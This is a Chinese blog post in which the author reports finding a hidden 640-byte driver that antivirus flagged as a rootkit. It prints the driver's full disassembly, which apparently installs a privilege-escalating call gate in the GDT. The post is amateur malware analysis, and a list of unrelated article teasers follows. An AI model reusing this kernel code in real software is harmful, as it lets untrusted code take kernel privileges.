一個奇怪的隱藏文件

原創 thinkSJ 2020-02-23 07:33

前幾日在我的機子上,發現了一個了隱藏的SYS文件,AntiVir報毒爲RootKit,看了一下才發現原來它很苗條,只是640Bytes,很有秀惑力吧:
.text:00010200                 .686p
.text:00010200                 .mmx
.text:00010200                 .model flat
.text:00010200
.text:00010200 ; 屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯?
.text:00010200
.text:00010200 ; Segment type: Pure code
.text:00010200 ; Segment permissions: Read/Execute
.text:00010200 _text           segment para public 'CODE' use32
.text:00010200                 assume cs:_text
.text:00010200                 ;org 10200h
.text:00010200                 assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
.text:00010200
.text:00010200 ; 壙壙壙壙壙壙壙?S U B R O U T I N E 壙壙壙壙壙壙壙壙壙壙壙壙壙壙壙壙壙壙壙?
.text:00010200
.text:00010200 ; Attributes: bp-based frame
.text:00010200
.text:00010200                 public start
.text:00010200 start           proc near
.text:00010200
.text:00010200 var_2A          = qword ptr -2Ah
.text:00010200
.text:00010200                 push    ebp
.text:00010201                 mov     ebp, esp
.text:00010203                 nop
.text:00010204                 nop
.text:00010205                 nop
.text:00010206                 nop
.text:00010207                 pushf
.text:00010208                 pusha
.text:00010209                 push    edx
.text:0001020A                 sgdt    [esp+28h+var_2A]
.text:0001020F                 pop     edx
.text:00010210                 mov     eax, edx
.text:00010212                 mov     ecx, 3E0h
.text:00010217                 mov     byte ptr [edx], 0C3h
.text:0001021A                 mov     [ecx+edx], ax
.text:0001021E                 shr     eax, 10h
.text:00010221                 mov     [ecx+edx+6], ax
.text:00010226                 mov     dword ptr [ecx+edx+2], 0EC0003E8h
.text:0001022E                 mov     dword ptr [ecx+edx+8], 0FFFFh
.text:00010236                 mov     dword ptr [ecx+edx+0Ch], 0CF9A00h
.text:0001023E                 popa
.text:0001023F                 popf
.text:00010240                 mov     eax, 0
.text:00010245                 leave
.text:00010246                 retn    8
.text:00010246 start           endp
.text:00010246
.text:00010246 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00010249                 align 20h
.text:00010249 _text           ends
.text:00010249
.text:00010249
.text:00010249                 end start

單從這段代碼上來看,好像沒有隱藏文件的功能,肯定還有其它的不乾淨東西,錄找中.
 發貼留個紀念

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

@property 屬性介紹

property declaration 屬性聲明 爲實例變量指定屬性(attributes)的途徑, 可讓編譯好器生成 無泄漏和線程安全的訪問實例變量的方法. @property 就是對應的編譯器指令 聲明一個與數據成員同名的屬性

yanxiaoqing 2020-07-08 11:39:41

Java遊戲服務器3

1)編碼     消息長度(short int-->2個字節) + 消息編號(short int--》2個字節) + 消息體 2)Protobuf協議文檔     (1)syntax="proto3";     (2)命名格式       

osc_hwc3munb 2024-05-14 02:04:28

Monibuca v5 實現優雅內存分配器

背景 v4 中使用了鏈表存儲了不同大小的內存塊的方式進行內存池的實現(參考這篇v4內存複用機制),實際測試中發現內存浪費比較嚴重,因此如何設計出使用效率高,操作簡潔的內存池就成了 v5 的一個任務。 使用 make 使用 go 原生的內存分

原創 2024-04-09 00:52:16

Java包裝類型

Java有8種基本數據類型,每種基本數據類型都提供了一種對應的包裝類型,從 Java 5 開始引入了自動裝箱/拆箱機制,使得二者可以相互轉換。 原始類型: boolean,char,byte,short,int,long,float,do

原創 2024-03-28 12:33:57

nasm 中文手冊

Nasm中文手冊 -------------------------------------------------------------------------------- 第一章: 簡介 --------------

prettykernel 2020-07-08 11:41:27

PinYin4J 使用

package test; import net.sourceforge.pinyin4j.PinyinHelper; import net.sourceforge.pinyin4j.format.HanyuPinyinCaseType;

sweetanan888 2020-07-08 09:17:55

cvCloneImage()和cvCopy()的區別

cvCloneImage()每次使用時編譯器會分配新的內存空間,不會覆蓋以前的內容,所以如果在循環中使用內存會迅速減小,每次用完都需要用cvRelease來釋放。解決方法是使用cvCopy函數代替。cvCopy(pSrcImg,pImg,

lcy9819 2020-07-08 11:22:40

用MASM實現讀UCS-2文件

關於UCS-2編碼就不多說了,Google一下就大把大把的了 直接上代碼 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .386 .model  flat , stdcall option

Just_Fancy 2020-07-08 11:15:30

C語言的一些細節總結

1)、類型比較和轉換問題 short和int類型之間直接比較或轉換都會出現內存錯誤;2)、判斷文件是否結束時,可能存在回車換行文件並沒真正介紹而內容已經結束了,需要用while (!feof(fp_signal_sort) && (fsc

redarm 2020-07-08 10:59:37

養生需知:世上最健康的作息時間

養生需知:世上最健康的作息時間  7:30:起牀。英國威斯敏斯特大學的研究人員發現,那些在早上5:22―7:21 分起牀的人,其血液中有一種能引起心臟病的物質含量較高,因此,在7:21之後起牀對身體健康更加有益。  7:30―8:00:

wsimei 2020-07-08 10:29:28

ASP正則表達式收集

hutchin 發表於 2006/10/31, 4:34 PM. 學習 用正則表達式突出顯示字符串中查詢到的單詞的函數<%'''''Function hs(aa,bb) ''建立函數hs,兩值:aa爲內容,bb爲需要查詢的字符Dim re

haichanglin 2020-07-08 10:27:05

太陽的女人18

id="I7" marginwidth="0" marginheight="0" src="http://www.bookeba.cn/securi

new66 2020-07-08 10:21:11

編程語言入門參考

1. Java Javasoft:  http://www.javasoft.com Sun: www.sun.com Developer.com: http://java.developer.com Tutorial: http://

rrerre 2020-07-08 09:36:58

磁盤修復相關整理

1. Linux下面 預防與檢測:使用smartmontools工具,用來控制SMART 檢測: 1)用badblocks工具檢測壞塊 #sudo badblock -s -v -c 64 /dev/sda 1000 10 (1000是結

rrerre 2020-07-08 09:36:58

Apache Tomcat 6.0.18與JDK的安裝配置

配置:    1.下載jdk-6u7-windows-i586-p.exe並安裝(E:/Java/jdk1.6.0_07) 2.配置環境變量   JAVA_HOME  E:/Java/jdk1.6.0_07   PATH       %J

银月术 2020-07-08 09:14:45